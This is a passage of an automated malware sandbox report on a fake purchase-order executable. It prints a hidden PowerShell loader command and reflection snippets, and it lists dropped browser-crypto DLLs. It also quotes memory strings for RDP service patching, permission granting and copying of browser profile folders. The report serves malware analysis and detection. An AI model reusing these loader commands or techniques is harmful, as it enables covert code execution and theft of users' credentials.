0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819552866.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819084006.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838682819.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838509091.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838592180.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837322407.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837322407.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837800667.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837599869.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838438880.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839489603.0000000021B56000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819029510.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818954283.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492817403.000000006FE89000.00000002.00000001.01000000.0000000B.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819029510.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818954283.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492817403.000000006FE89000.00000002.00000001.01000000.0000000B.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe,
          Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000D.00000002.2488865589.000000002073C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489099140.0000000020BC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817480011.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2491846197.000000006D57F000.00000002.00000001.01000000.0000000E.sdmp, wab.exe, 0000000D.00000003.1817722969.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817541628.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845212265.0000000004F78000.00000004.00000020.00020000.0
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdb source: wab.exe, 0000000D.00000002.2488865589.000000002073C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489099140.0000000020BC3000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000002.00000002.1779698085.000000000A28F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Terraefilian $Hypalgesic $Olivenite), (Labanen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Broddle = [AppDomain]::CurrentDomain.GetAssemblies()$global:
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spurtes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bingoernes, $false).DefineType($Treskiftsarbejder
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,13_3_214D981B
          Source: msvcp140.dll.13.drStatic PE information: section name: .didat
          Source: mozglue.dll.13.drStatic PE information: section name: .didat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B4F64 push ebx; iretd 2_2_096B4F7D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BA97B push eax; ret 2_2_096BA97C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BA17A push eax; ret 2_2_096BA17C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BA77A push ebx; iretd 2_2_096BA7B9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B6948 push 00000062h; ret 2_2_096B6957
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BA74E push ebx; iretd 2_2_096BA7B9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B4330 push eax; ret 2_2_096B4334
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B491B push eax; ret 2_2_096B4930
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B97E9 push eax; iretd 2_2_096B97ED
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B97D8 push eax; ret 2_2_096B97E8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B95A1 pushad ; ret 2_2_096B95B1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B4986 push eax; ret 2_2_096B4988
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B464F push eax; ret 2_2_096B46B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B4229 push es; ret 2_2_096B4241
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BAE38 push cs; iretd 2_2_096BAE39
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B9A1E push eax; ret 2_2_096B9A20
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B4611 push eax; ret 2_2_096B4614
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BB0C3 push edi; retf 2_2_096BB0C9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B94D8 push esp; iretd 2_2_096B94D9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BB2AC push eax; ret 2_2_096BB2B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B4CA4 push edi; retf 2_2_096B4CA5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BA8BD push eax; retf 2_2_096BA8C8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BAABD push esi; iretd 2_2_096BAABE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B9AB3 push es; retf 2_2_096B9ACE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BB0B2 push es; iretd 2_2_096BB0B5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B46B1 push FBFBA09Dh; retf 2_2_096B46E9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BAA8B push eax; ret 2_2_096BAA8C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BB48A push eax; retf 2_2_096BB4D4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B928C push edi; iretd 2_2_096B928D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096BA48C push ss; iretd 2_2_096BA4A5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_096B629B pushfd ; iretd 2_2_096B629D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\nss3.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\softokn3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72\PO2737478834ORDER.exeJump to dropped file
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\vcruntime140.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\freebl3.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\msvcp140.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\mozglue.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: wab.exe, 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: wab.exe, 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
